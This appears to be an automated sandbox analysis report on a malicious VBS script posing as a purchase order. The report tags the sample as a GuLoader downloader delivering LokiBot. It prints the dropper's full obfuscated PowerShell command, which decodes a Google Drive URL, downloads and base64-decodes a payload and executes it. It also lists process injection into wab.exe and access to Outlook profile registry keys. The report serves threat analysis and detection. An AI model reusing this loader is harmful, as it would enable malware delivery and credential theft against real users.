Malware Analysis Report

2025-05-28 17:39

Sample ID 240311-rwallshb97
Target PO 05-03-2024 AKTINA-CDS.vbs
SHA256 9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9e544c53dffc7c410220f17bc3a9f96f83f98a2bcdaa882183408d5194bf6a9e

Threat Level: Known bad

The file PO 05-03-2024 AKTINA-CDS.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Guloader,Cloudeye

Lokibot

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

outlook_win_path

outlook_office_path

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-11 14:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-11 14:32

Reported

2024-03-11 14:34

Platform

win7-20231129-en

Max time kernel

119s

Max time network

127s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1136 set thread context of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 1212 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 1212 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 1212 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 2872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 2872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1212 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1212 wrote to memory of 1136 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1136 wrote to memory of 1804 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 1804 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 1804 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 1804 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1136 wrote to memory of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1136 wrote to memory of 2796 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PO 05-03-2024 AKTINA-CDS.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Baissers Gennemlevet Skovmaare bordlampernes overdepending Tinged Solvation #>;$Tartane=(cmd /c set /A 115^^0);Function Greaseless ([String]$Dampsprre){$Tartane=[char][int]$Tartane;$Singlesculleren=$Tartane+'ubstring';$Saamaskinenndgaar=8;$Artifact=Rigsrevisorloven4($Dampsprre);For($Saamaskinen=7; $Saamaskinen -lt $Artifact; $Saamaskinen+=$Saamaskinenndgaar){$Apeks10=$Dampsprre.$Singlesculleren.Invoke($Saamaskinen, 1);$Rigsrevisorloven=$Rigsrevisorloven+$Apeks10;}$Rigsrevisorloven;}function Signficantly ($Gring){& ($Rigsrevisorloven01) ($Gring);}function Rigsrevisorloven4 ([String]$Argumentspecifikationer){$Forstrke1=$Argumentspecifikationer.Length-1;$Forstrke1;}$Rigsrevisorloven02=Greaseless 'ForskreTfins.rir,armeovameletinnF.restislaseretf Frimnde C mmisrBa tegnrUndg,deimokkasinExpurgagGotikse ';$berigningernes=Greaseless 'haan.vghIndurant Vr,raat Au,incp GidselsOx loac:Teskere/Snorket/ An,aegdFjortenrC.mpingiEnforesvtoxaemieSerm.ni.MuscavagCorantoo troweloAuktiong i terwlZimmerweOverdom. KsnehacHy.rocao Bron.hmdisabus/Ubenvntu SkudtecFor,igt?LiftingeRecon ixclinchepCigaretoBa,udlnrNeij.sst Ign,pu= StikledRaveineo Infa cw.omitecnFimsenelAssertooKretidsaDialytidVirks m&SetterniOligosydMyelopa=Grammat1BoligenVBakkendCG.rmantd overvaQAfs ndi1 D.crepJConringa PostpaB Vinter2NavneorGL.mperacTrypt scprighooj UnsolduGe,brugCMarkmaniMislighOOldefdrgErotomaeHobbier4Begi,en6Nobesge1Sama,beuClang.nX .eningQFunktioQWandlikDSurprecfRhi.inaadagligp9 zoopsy- T.iennMHnsehus ';$Rigsrevisorloven01=Greaseless 'ManglediRinninge buliabxunderv ';$Rigsrevisorloven00=Greaseless 'Sej ruk$DelnoeggKedlenslBontebuoLfterbebMacrongaParticulUllings:nonco,gFSubc.ntoUdtydedrVaarbebs VekseltP estigrKvitt rkCir,opheHaiku t8Mis kst Leg,ml=Splodge SteelhSSpexenet C,lpitaRurlgeurUnwishetN nelec-LauraldB Ta ineiIngardstNcarspjsDenotabTLi enyrrBaptisia Fnblgnnste.svisPredictfOmstbnieAntistarSoegete Weake,s-NebulisSAktieliomurksvauInnovatrDommed c UglereeRipston Afmatni$Di gorgb S.kkerepeekab,rMilj raiMisr,lagFlisesenRetroveiS.goejnnSpectacgBeskedee,nvoicirParchisnMes.erieVizslassPrdikat Tuefor-EcstatiDNuancineSe,ologsSoilagetElektroi.onfilinSpyendeaReoperatComakesiSpir tuoOperatin Massse Pi.kups$ AcademFC onicroTramcarrSmands.s ,ortiet TerefarSkndetfk Udf.lieMiskych2Interb ';Signficantly (Greaseless 'Co.tain$.agnomsg An,ulllBagmakeoSvejsefbMedmenna Taalsoleksiler:odontolFUdmaltioRo.ekonrUnhea,esRdmedestKrediterL,ftsrukKjrulffeLagrang2 Nailed=Besl.gs$ balanceWeaklinnTod menvE.sanci:OuttradaRoaredgp AllonypRepo,tedCnidosiaRchitectJordaneaSimulta ') ;Signficantly (Greaseless 'Steg paI leskabmFormyndp nfanteoAandsslr NovemptLaven m-Slid,etM ,andfroAntagondGlan,esuHoutp rlAbund.neSin,fot ArbejdsB ma icbiTryksvatT.rbenssRedeploTAfbankirForn.ftaKorporlnPont.acsuafgjorf upbuoyeSquitterCompreh ') ;$Forstrke2=$Forstrke2+'\Sprgerens.Cav' ;Signficantly (Greaseless 'Condole$FinnmargFormumnl ,ectonoKrybeipbPlankevaCystostl gyptol:AbjectiFInvendioS,dafrirTumefyisSaucematSamtykkr .olysekHalvbueeunderto7 Indpla=Adjoint(CrapaudT NajendeCorrectsHe stnitDekater-PewskenPDcorbeaa Hol.bat ypnothT.olley Reneta$ bullpuFVergerloBradawlr DataposPreco.ftMillasnrdomsto.kMisalt,eSpinope2 krome.) Spiree ') ;while (-not $Forstrke7) {Signficantly (Greaseless 'Fals fiI.lagetof Sta tt Deaconr(Vand va$ Smit.eFTapereroIndustrrFactitisEtrusketOutrivar.lektrok FedthaeDaggrye8markhor.FrifindJMnst.rgoR geligbTvangs.SSubk,tatNeutralaPrestidt AffirmeLrkenpa Appoint-afparereL itancqmandsch Stersky$ByggeleR VakuumiKonjakggScisselsKaprerer DivorceThundervRykkerbiS lfsaisBnli.esoNostalgr,lamodil ForeneoSpadserv Tax,cleHrdneafn Forskr0Kassevo2 Un,len)unfondn Coccoli{Sul rinSVi,tualtBe,ixttaS,gnetrrTruge.st D sire-Sul.anaSSkiftetlIreosoveLich ake LbepompNocerit Virksom1 Paaske}Sheart,eWillfulls.necurs slugteenarcoti{Krom toS Univert sk.vsaamispricrDevisertFission- T milsSLitt ralPaydayseE.spreseBenzinspbestikk Wayment1App.oks;Omprio S,elanchiIntershgAfstikknMagasr.fS,imulaiMetalwocPhytopta Stabe nOve.skatTrbe kyl Affyrey Topbet Spoofed$IndskrnR remindiHornbeagCascromsDuplikerSagestke PoliorvDiscan,inabolagsPrevailobagpiperKonias lFor.udsoKonsulevsham,oceDjvleudn.echeck0Potable0 F,jlre}Portabi ');Signficantly (Greaseless 'Apokope$GadeuorgSulfidelAdminisoStallmabAminoaca Thane,lFormnin:Lobu.itF HjemadoSubstanrGenrefosStorktrtLeveaarrTehuseskPro meneOrdrese7Choledo=Palaeon(FlagdugTPlayfele Vagtlesmotortrt enmoto-millocrP AmmermabygningtMesenteh Aan.sa Trichob$S.isekaF Kva.taoBekendtrPsoralesPhe,ometW,edlinrCharro,kIlluviaehaugesk2Hormone)Opsugni ') ;}Signficantly (Greaseless 'Tegular$VrimlengEng andl.idevenoB naughbK ightaaAfskumnl Quinti: hallotA PolyppvNveombuaAfmattenautopyoiOberstlaUnderst bi che=Bekrfte IdelrerGUnders eTransshtjockey.-G,atbruC ateteroTe egranDetailptAlarmu,e quaes nUnpretet Kodese Coadjut$SongletFHockeykoBow yparMaccabasNeedypetNe.opanr Morakkk kiftereUnhinde2 .ndlin ');Signficantly (Greaseless 'Heterom$ Phyt,ggHeadendlW.shasto spidombBygg saa Ind omlHeksame: Sa,ctiKexcernboNytaarsgOkkupateVirksoms BygakspMatchmarHenaandiDengsertSpkkecotUnbedfae Sorts nAmiasresMercena Skihopp=Accroac Suppler[ BelizeSSpr ngdy,roszyssPolyphot muldreKlevarem erdeop.ModpartCRameousoAffichenUomgn ev profuneModningrProgr.mt Siksak]Corfit :Bisfrak: HarehoFTrffe.irB ligydoHomacanmGulasmaBFjerndia lfactisTerceleeAgkistr6Worce.t4DopingsSLispountBirianirSul,houiSparusmnGeodt.agFalskne( Shortc$ PeriskADisobedvExpensiaFodfolknBu.lcomiSolomonaLi.iere)sekundr ');Signficantly (Greaseless 'Forplig$congealgScenefulUnblindoTvangsfbbermudaa Spade,l ,vangl:Folkl,rR CachuaiProlifegOverrassFibromerMrkningeUnder rvFrigreliVividvisProletaoFr sager Sl etrl Sj.tteoStavbaavBeinlyaeBayonnenDvelrer2Tautego Returko=.nlaure Vildsku[Unde,kuStegneseyOrganogsKinostetOutgaineKvaseh.m U.beau.LectureTclacklie,amnonixAgnyomstUnresem. PellitEAntioxinBa,talecB,llatao patterdDefineriUltrafinanthracgS.miorg]Fase um:Berl ne:Demole ASa dierSLatyrusCUnree,eI KinesiIstyrtdy.vildmndG PinchpeFyldetstAfknapsS KertertErgoterrEyeglasi psychrnLio.neagscirocc(Tensio.$Par.plyKPrepareoMo.elfogForn teeTopdelesSu.fonapUndergrrTankeeki FanebltRaillert Flerkoeisotenin SchismsFluorid)Cdgchau ');Signficantly (Greaseless 'Unmedic$compagngAn.ennelMatematoApoteksbFri.hteaUdp,ntelsuccour:TopbetjR Slgendi unexplg,ervekrsSekraftrPtilotae glennsvEntomoliSamanfesCystosyo durganruforesplFungiteo Radforv,verstaeDroschenTerras.3.amenen=Stegefe$,edsaltRImbeciliPr,gramg.tikdaas OmbrinrStrongyeRati,navBrnd,mriChastitsAsymmetog,andoar TuberclSubmucoocrackmavVkstbeteMilieubnC.illin2Hftetsb.Tr,holds,steriau Ru,egobBugspytsTramlintLitt,rtrDesillui SergelnMillen,gFravnni( Nyopre3 E fing2Frances2 Str so4 Po.ari7Equipoi2 Anpart,mismeas3Carragh1Syn.opa2Lugedes6Gos ipi1S.spect) Afsk,b ');Signficantly $Rigsrevisorloven3;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 drive.google.com udp
NL 142.250.179.142:443 drive.google.com tcp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
NL 142.251.36.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 88.221.134.146:80 crl.microsoft.com tcp
NL 142.250.179.142:443 drive.google.com tcp
NL 142.251.36.33:443 drive.usercontent.google.com tcp

Files

memory/1212-16-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/1212-17-0x0000000002870000-0x0000000002878000-memory.dmp

memory/1212-18-0x0000000002CA0000-0x0000000002CC2000-memory.dmp

memory/1212-19-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1212-20-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-21-0x0000000002AB0000-0x0000000002AC2000-memory.dmp

memory/1212-22-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1212-23-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-24-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-25-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DQXVUI804L86F8K9D92.temp

MD5 ca01db601cb05e0bfb553367bd49d033
SHA1 a68268457978b2ff2d9d5329883b57709adf3f44
SHA256 64c45a706f3d8ef66def539981f84534d395e9045359136a6d2c1e46d9e8c4f5
SHA512 918c5370e72616e8c9de19fd1798145d9883886a39ab8752e1de4e145f27761ad464319eb17e50d470427d2b82c8fd957a619f5cc515f23f6ace11d74a8d130c

memory/1212-28-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-29-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp

memory/1212-30-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1212-31-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1136-33-0x0000000002CD0000-0x0000000002D10000-memory.dmp

memory/1136-32-0x0000000072D30000-0x00000000732DB000-memory.dmp

memory/1136-34-0x0000000072D30000-0x00000000732DB000-memory.dmp

memory/1212-35-0x0000000002D40000-0x0000000002DC0000-memory.dmp

memory/1136-36-0x0000000002CD0000-0x0000000002D10000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 211771b8306b4df71d2a1099cd2460e9
SHA1 d1ab514058c1e2058f0904fef16df876addce6be
SHA256 0e4a23b253b8c9a9f73cc646259ddf001c9ac9c089a3727bb78df33552f37628
SHA512 e773bb71e4db65c68a5997d380068976facbcab97c03c9f0c2bcd6b0c5b7e821cbb1bc116e78e130805ce45bd9444db9931626168ca767dcd6b54a51d5e5b525

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 ddcde6f00e701c39a183b23e268aa671
SHA1 fc1bcdc60cc8e9f5e37883539d20ea330edda727
SHA256 d88738ba308762b61429ac0b4be38b963ab91db5a91d37b00c1a6a05dd96dfd8
SHA512 1e1bd6018888c7ee898fdfb252dac9bb4ae4898c1de254dd2c0fe88593180c03694b0368d97b5f8bf94340c67d04584de9754236d86999c7ce42e431b0f7b68b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/1136-53-0x0000000002CD0000-0x0000000002D10000-memory.dmp

memory/1136-54-0x0000000006120000-0x0000000006121000-memory.dmp

memory/1136-55-0x0000000006D50000-0x0000000009B70000-memory.dmp

memory/1136-56-0x0000000006D50000-0x0000000009B70000-memory.dmp

